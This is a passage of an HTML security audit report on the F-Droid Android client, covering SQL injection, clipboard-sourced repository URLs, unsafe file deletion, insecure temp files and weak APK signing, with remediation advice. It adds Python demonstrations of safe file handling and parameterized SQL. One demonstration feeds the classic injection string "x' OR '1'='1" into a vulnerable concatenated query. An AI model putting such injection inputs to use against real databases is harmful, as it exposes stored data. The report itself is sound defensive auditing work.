<div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <a href="https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)" style="color: #e2632a;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</a></div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">An out-of-band key sharing mechanism, such as sharing a password-protected file containing a symmetric encryption key over the insecure RFComm socket, can be used to exchange keys between untrusted devices instead of relying on TOFU.
</div>
</div>
</div>
<a name="f35-potential-sql-injection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.19</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-019 — Potential SQL Injection</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-019</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Concatenation of strings, some of which are under attacker control, is used to form DB queries.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Several functions in the data subdirectory build DB queries by string concatenation for operations on the package name and other package-supplied or repo-supplied parameters.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">data/QueryBuilder.java: Lines 67-75 and lines 168-172
data/AppProvider.java: Lines 268, 700, 737, 922, 1058, 1081, 1132, 1178
data/TempApkProvider.java: Line 107
data/ApkProvider.java: Lines 315, 470
data/FdroidProvider.java: Line 146
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, these should be tightened so we don't have to trust the server.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Corruption in device based DB leading to device compromise</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Use prepared statements for DB query preparation.</div>
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate the strings against a whitelist before using them in a SQL query.</div>
</div>
</div>
<a name="f41-app-uses-data-from-clipboard"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.20</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-020 — Unverified URI redirect</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-020</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>URI redirect</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">App Uses Data From Clipboard for external resource link.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In file ManageReposActivity.java, when the AddRepo action is selected, the public method onOptionsItemSelected() at line 148 calls showAddRepo(), which appears to load an <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http://</span> URL from the clipboard if the clipboard contents look like a URL.
</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">It may be possible for another application to populate the clipboard with a malicious URL.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
157: private void showAddRepo() {
        /*
         * If there is text in the clipboard, and it looks like a URL, use that.
         * Otherwise use "https://" as default repo string.
         */
        ClipboardCompat clipboard = ClipboardCompat.create(this);
        String text = clipboard.getText();
        String fingerprint = null;
        String username = null;
        String password = null;
        if (!TextUtils.isEmpty(text)) {
        ...
        ...
189:        text = NewRepoConfig.sanitizeRepoUri(uri);
        ...
        ...
287:    case DOESNT_EXIST:
            prepareToCreateNewRepo(url, fp, username, password);
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">This may be leveraged to change the status and fingerprint of an existing repo (lines 653-658).</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
Utils.debugLog(TAG, "Enabling existing repo: " + url);
Repo repo = RepoProvider.Helper.findByAddress(context, url);
ContentValues values = new ContentValues(2);
values.put(RepoTable.Cols.IN_USE, 1);
values.put(RepoTable.Cols.FINGERPRINT, fingerprint);
RepoProvider.Helper.update(context, repo, values);
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, I guess this is true. The Add Repo prompt shows the URL it got from the clipboard. I can't think of another way to defend against this.
</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Malicious redirect and interaction with a remote resource can potentially cause complete device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">If this feature is not needed, it should be removed.</div>
</div>
</div>
<a name="f43-file-deleted-unconditionally"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.21</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-021 — File Deleted Unconditionally</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-021</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>File deletion</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The application deletes the specified file unconditionally if it exists.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">In zipio/ZipOutput.java, the output file is unconditionally deleted if it exists.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
58: private void init( File ofile) throws IOException
    {
        if (ofile.exists()) ofile.delete();
        out = new FileOutputStream( ofile);
        if (getLogger().isDebugEnabled()) ZipListingHelper.listHeader( getLogger());
    }
</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Denial of service, or damage to the system, if a system-critical file is deleted.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">On finding that the output file exists, the function should return an error and let higher-level code handle it. Alternatively, the code should add a random suffix to the output file name if the specified file exists.</div>
</div>
</div>
<a name="f44-secure-temp-file-usage-recommended"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.22</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-022 — Secure Temp File Usage Recommended</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-022</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure temp file</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd.java uses insecure temp files</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">nanohttpd.java</span></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd uses the java.io.tmpdir system property as the folder in which to create temp files. For secure usage, temp files should only be created within a subfolder of a public, system-wide temp directory.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">576: tmpdir = System.getProperty("java.io.tmpdir");
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">At several places in the code, the temp files in "tmpdir" are created with a random string and the NanoHTTPD- prefix, making the temp file usage somewhat secure.
</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">610: file = File.createTempFile("NanoHTTPD-", "", new File(tempdir));
1297: private String saveTmpFile(ByteBuffer b, int offset, int len) {
          String path = "";
          if (len > 0) {
              FileOutputStream fileOutputStream = null;
              try {
                  TempFile tempFile = tempFileManager.createTempFile();
                  ByteBuffer src = b.duplicate();
                  fileOutputStream = new FileOutputStream(tempFile.getName());
1318: private RandomAccessFile getTmpBucket() {
          try {
              TempFile tempFile = tempFileManager.createTempFile();
              return new RandomAccessFile(tempFile.getName(), "rw");
</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">The tempfile so created is not restricted in its permissions.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Information disclosure, data tampering leading to integrity compromise</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">The File class in Java allows creation of subdirectories and setting specific permissions on created files. It is recommended to create the temp files within an app-specific subdirectory, for example "Fdroid", under the global tmp folder. This subfolder can be created with owner-only permissions, and the other temporary files can then be created with restricted permissions within this app-specific folder.
</div>
</div>
</div>
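<div style="margin-bottom: 5pt; line-height: 6mm;">As an added example (not code from F-Droid or NanoHTTPD), the following Python models the two recommendations above: the exclusive-create behaviour asked for in OTF-021, so an existing output file is reported as an error or given a random suffix rather than deleted, and the owner-only temp subdirectory asked for in OTF-022. The directory name "fdroid-example", the 0o700/0o600 modes and the POSIX ownership check are this example's own assumptions.</div>

```python
"""Added example, not F-Droid or NanoHTTPD code: safe output-file and temp-file
creation for the OTF-021 and OTF-022 recommendations. Expects a POSIX system;
the subdirectory name and permission modes are this example's own choices."""
import os
import secrets
import shutil
import stat
import tempfile


def private_temp_dir(app_name="fdroid-example"):
    """Create (or reuse) an owner-only subdirectory under the system temp dir.

    This is the app-specific "Fdroid"-style folder from the recommendation,
    inside which every temp file is then created."""
    base = os.path.join(tempfile.gettempdir(), app_name)
    try:
        os.mkdir(base, 0o700)
    except FileExistsError:
        pass
    # lstat so a symlink planted at this path is rejected rather than followed.
    st = os.lstat(base)
    if not stat.S_ISDIR(st.st_mode) or st.st_uid != os.getuid():
        raise OSError(f"{base} is not a directory owned by this user")
    if stat.S_IMODE(st.st_mode) & 0o077:
        raise OSError(f"{base} is readable or writable by other users")
    return base


def create_exclusive(path, mode=0o600):
    """Create `path` only if it does not exist yet: one atomic check-and-create.

    Replaces the exists()/delete()/new FileOutputStream() sequence seen in
    ZipOutput.init(): a pre-existing file raises FileExistsError for the
    caller to handle, and a new file is owner-readable/writable only."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
    return os.fdopen(fd, "wb")


def create_with_random_suffix(path, mode=0o600, attempts=16):
    """The alternative from the recommendation: keep the existing file and
    create `path.<random hex>` instead. Returns (chosen_path, open_file)."""
    candidate = path
    for _ in range(attempts):
        try:
            return candidate, create_exclusive(candidate, mode)
        except FileExistsError:
            candidate = f"{path}.{secrets.token_hex(4)}"
    raise FileExistsError(f"no free name found for {path}")


def file_mode(path):
    """Permission bits only (e.g. 0o600), for checking what was created."""
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Run the whole flow in a throwaway directory and report what happened."""
    base = private_temp_dir()
    work = tempfile.mkdtemp(prefix="zipout-", dir=base)  # mkdtemp also uses 0o700
    out_path = os.path.join(work, "output.zip")
    result = {"dir_mode": file_mode(base), "work_mode": file_mode(work)}
    try:
        with create_exclusive(out_path) as f:
            f.write(b"PK")  # constructed placeholder content
        result["file_mode"] = file_mode(out_path)
        # A second create must fail instead of silently deleting the first file.
        try:
            create_exclusive(out_path)
            result["refused_overwrite"] = False
        except FileExistsError:
            result["refused_overwrite"] = True
        result["still_present"] = os.path.exists(out_path)
        alt_path, alt = create_with_random_suffix(out_path)
        alt.close()
        result["suffixed"] = alt_path != out_path and alt_path.startswith(out_path + ".")
    finally:
        shutil.rmtree(work)
    return result


if __name__ == "__main__":
    print(demo())
```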
<a name="f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.23</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-023 — (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-023</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application was found to be signed with <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 with RSA has known collision issues, hence it is not recommended to be used for signing new apps.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: If you use SHA256, the app will no longer work on Android devices < 4.3. This means that builds made with the new cert system will create APK files that may not install on some Android 4.0-4.2 devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
Version: V3
Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
Key:
Validity: [From: Fri Jul 23 22:40:24 IST 2010,
To: Tue Dec 08 22:40:24 IST 2037]
Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
SerialNumber: [ 4c49cd00]
]
Algorithm: [SHA1withRSA]
]</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Signing an app with a weaker algorithm makes it easy for attackers to create a fake cert and sign a malicious app.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.</div>
</div>
</div>
<a name="f47--fdroidclient-raw-sql-query-executions"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.24</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-024 — (fdroidclient) Raw SQL Query Executions</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-024</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">App uses and executes raw SQL query. An untrusted user input in raw SQL queries can lead to SQL Injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application uses raw SQL query execution in the files below:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\AppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\DBHelper.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\InstalledAppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\LoggingQuery.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\TempApkProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>•</div></td><td width="7.56"> </td><td valign="top"><div>org\fdroid\fdroid\data\TempAppProvider.java</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Example of raw SQL query execution:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DBHelper.java</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">sQLiteDatabase.rawQuery("UPDATE fdroid_app SET iconUrl = ( SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version >= ? THEN ? ELSE ? END || fdroid_app.icon) FROM fdroid_apk JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo) WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode ), iconUrlLarge = ( SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version >= ? THEN ? ELSE ? END || fdroid_app.icon) FROM fdroid_apk JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo) WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode)", new String[]{string4, string2, "/icons/", string4, string3, "/icons/"});
DBHelper.clearRepoEtags(sQLiteDatabase);</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Executing raw SQL queries with untrusted user input might lead to SQL injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended never to place unvalidated user input inside a SQL query and execute it. The best way to make sure adversaries cannot inject unsolicited SQL syntax into your queries is to avoid SQLiteDatabase.rawQuery() with concatenated input and to use a parameterized statement instead.</div>
</div>
</div>
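<div style="margin-bottom: 5pt; line-height: 6mm;">As an added example (not F-Droid code), the following Python shows the concatenated-query pattern flagged in OTF-019 and OTF-024 beside the parameterized form and the whitelist check the recommendations call for, run against an in-memory SQLite database. The fdroid_app layout and the package names are constructed for the demo; on Android the same split is rawQuery() with spliced strings versus query()/rawQuery() with selectionArgs.</div>

```python
"""Added example, not F-Droid code: string-concatenated SQL versus bound
parameters plus whitelist validation, on a constructed fdroid_app table."""
import re
import sqlite3

# Whitelist for Android package names: dot-separated Java identifiers.
PACKAGE_NAME_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]*(\.[A-Za-z][A-Za-z0-9_]*)+")


def make_db():
    """Constructed sample data standing in for the on-device fdroid_app table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE fdroid_app (id TEXT PRIMARY KEY, name TEXT, repo INTEGER)")
    db.executemany(
        "INSERT INTO fdroid_app VALUES (?, ?, ?)",
        [("org.fdroid.fdroid", "F-Droid", 1), ("org.example.app", "Example", 2)],
    )
    return db


def find_app_concat(db, package_name):
    """Vulnerable pattern: a repo-supplied name is spliced into the SQL text,
    so a name containing quotes changes the structure of the query."""
    sql = "SELECT id FROM fdroid_app WHERE id = '" + package_name + "'"
    return sorted(row[0] for row in db.execute(sql))


def find_app_param(db, package_name):
    """Fixed pattern: the value travels as a bound parameter and is never
    parsed as SQL, whatever characters it contains."""
    rows = db.execute("SELECT id FROM fdroid_app WHERE id = ?", (package_name,))
    return sorted(row[0] for row in rows)


def is_valid_package_name(package_name):
    """Whitelist validation to apply to index/repo data before any DB use."""
    return PACKAGE_NAME_RE.fullmatch(package_name) is not None


def find_app_safe(db, package_name):
    """Both recommendations together: reject names outside the whitelist,
    then bind the value rather than concatenating it."""
    if not is_valid_package_name(package_name):
        raise ValueError(f"rejected package name: {package_name!r}")
    return find_app_param(db, package_name)


if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"  # constructed value standing in for a hostile repo entry
    print("concatenated:", find_app_concat(db, crafted))   # every row leaks
    print("parameterized:", find_app_param(db, crafted))   # no match
```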
<a name="f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"></a><div style="margin-bottom: 1.3cm;">
